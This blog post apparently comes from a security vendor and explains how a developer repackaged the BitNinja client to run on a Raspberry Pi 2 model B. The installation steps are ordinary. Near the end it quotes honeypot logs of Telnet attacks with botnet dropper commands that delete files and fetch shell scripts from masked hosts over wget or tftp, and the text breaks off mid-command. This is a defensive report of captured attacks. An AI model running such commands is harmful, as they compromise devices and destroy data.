Pi-Ninja-Security for RaspberryPi

The real geek escaped from one Ninjastic developer of ours lately, and in his freetime he decided to try to install BitNinja on his Raspberry Pi 2 model B. And guess what happened? He was successful! What is more, BitNinja also captured some attacks with its port honeypot module. Now, let me describe you the process of the installation and what he exactly found.

So the tool is Raspberry Pi 2 model B, and he uses Linux: Raspbian GNU/Linux 8 on it.

The process:

Bitninja is not available for arm architecture, so he was not able to install it from the Bitninja debian repository.  To by-pass this issue, he downloaded the packages from the repository:

wget http://apt.bitninja.io/debian/pool/non-free/b/bitninja-dojo/bitninja-dojo_LATEST_VERSION_amd64.deb
wget http://apt.bitninja.io/debian/pool/non-free/b/bitninja/bitninja_LATEST_VERSION_amd64.deb

„bitninja” is the client itself

„bitninja-dojo” is a standalone PHP executable

He started with the „bitninja” package, as the „bitninja-dojo”’s operation depends on the former one.

1, Create a directory for it

mkdir bitninja-dojo_armhf

2, Move the downloaded .deb file into the directory

mv bitninja-dojo_LATEST_VERSION_amd64.deb bitninja-dojo_armhf/bitninja-dojo_amd64.deb

3, Open the directory

cd bitninja-dojo_armhf

4, Unzip the .deb file with this command:

ar vx bitninja-dojo_amd64.deb

5, Delete it

rm bitninja-dojo_LATEST_VERSION_amd64.deb

After unzipping, we get 3 files

debian-binary

data.tar.gz –>contains all data in the package

control.tar.gz–>this zipped file contains the dependence of the package and the step by step instructions of the installation

6, Create a new directory

mkdir control

7, Move the control.tar.gz to the new directory and open it

mv control.tar.gz control/
cd control

8, Unzip it

tar -zxvf control.tar.gz

9, Delete the zipped file

rm control.tar.gz

10, After this, you need to create the following:

mcedit control

11, Find the following line and rename it

This:

Architecture: amd64

To this:

Architecture: armhf

12, Save it

13, Check the dependence of the package (in the control file):

Depends: libc6 (>= 2.11), zlib1g (>= 1:1.1.4)

So, it depends on two packages: libc6 és a zlib1g

As it is not defined, which architecture the package should originate from, so it should get them from one of the directories during the installation.

Just to make sure it works 100%, he installed them beforehand.a

pt-get update
apt-get install libc6 zlib1g

14,  Now, it is time to condense the conent of the control file

tar czf control.tar.gz *

15, Move it outward, and go one shell back:

mv control.tar.gz ../ cd ..

16, delete the control directory

rm -r control

17, it is time to repackage 3 source files into 1 .deb file

ar r bitninja-dojo_armhf.deb debian-binary control.tar.gz data.tar.gz

18, You can install it with this command:

dpkg -i bitninja-dojo_armhf.deb

As a matter of fact, we only had to modify the architecture, nothing else.

With the BitNinja package, you should follow the same steps as in the case of the BitNinja-dojo

19, Repeat the steps from 1 to 12 than check the dependence of the Bitninja file

Depends: bitninja-dojo (>= 1.6), ipset, daemon, iptables (>= 1.4.7), awk, net-tools, grep, gzip, sed, coreutils, lsb-release

As the BitNinja dojo is already installed, we only need to work with the other dependencies.

As he mentioned, the package should download the dependencies with itself. As he installed them for himself, he was not sure if it will work for the bitninja, as he had some issues with the awk package. :

Reading package lists... Done
Building dependency tree
Reading state information... Done
Package awk is a virtual package provided by:
original-awk 2012-12-20-2
mawk 1.3.3-17
gawk 1:4.1.1+dfsg-1
You should explicitly select one to install.

E: Package ‘awk’ has no installation candidate

Instead of this, he installed gawk

20, The whole command:

apt-get install ipset daemon iptables gawk net-tools grep gzip sed coreutils lsb-release

21, Follow the steps from 14 to 18

If you have done everything correctly, now the BitNinja is installed on your Raspberry, although, for now it will not start yet. The BitNinja client does not use php package, but it runs the php code with a standalone binary.  This is the bitninja-dojo. He though, it is probable that the binary is dependable on the architexture. (/opt/bitninja-dojo/run/bin/bitninja-dojo).

However, it is easily readable, as the php’s binary is similar and also available on the raspberry.

22, Install  the php5 with curl

apt-get install php5 php5-curl

23, change the bitninja-dojo with the php5 executable at the following places:

/opt/bitninja/bitninja
/usr/sbin/bitninja-config
/usr/sbin/bitninjacli

this line:

#! /opt/bitninja-dojo/run/bin/bitninja-dojo -c=/opt/bitninja/etc

to this:

#!/usr/bin/php --php-ini=/opt/bitninja/etc

24, Set the license-keyt:

bitninja-config --set license_key=LICENSE_KEY

25, start the BitNinja:

/etc/init.d/bitninja start

For him, the BitNinja runs smoothly on his server.  The load is between 1,5 and 2,0.

If you would like to catch some bad guys with your Raspberry Pi , do the following settings:

Set your raspberry’s internal IP at the router’s DMZ (demilitarized zone) settings, and you can start the hunting. 🙂 

Our developer encountered with the following Telnet attacks:

“PORT HIT”: “xxx.xx.xxx.xx:46376->192.168.1.93:23″,

“MESSAGES”: “Array

(

=> sh || bash || shell

=> cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wgethttp://xxx.xx.xxx.xxx/bi.sh || wget http://xxx.xx.xxx.xxx/bi.sh || busybox tftp -r bi2.sh -g xxx.xx.xxx.xxx || tftp -r bi2.sh -g xxx.xx.xxx.xxx || busybox tftp xxx.xx.xxx.xxx

=> cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wgethttp://xxx.xx.xxx.xxx/bi.sh || wget http://xxx.xx.xxx.xxx/bi.sh || busybox tftp -r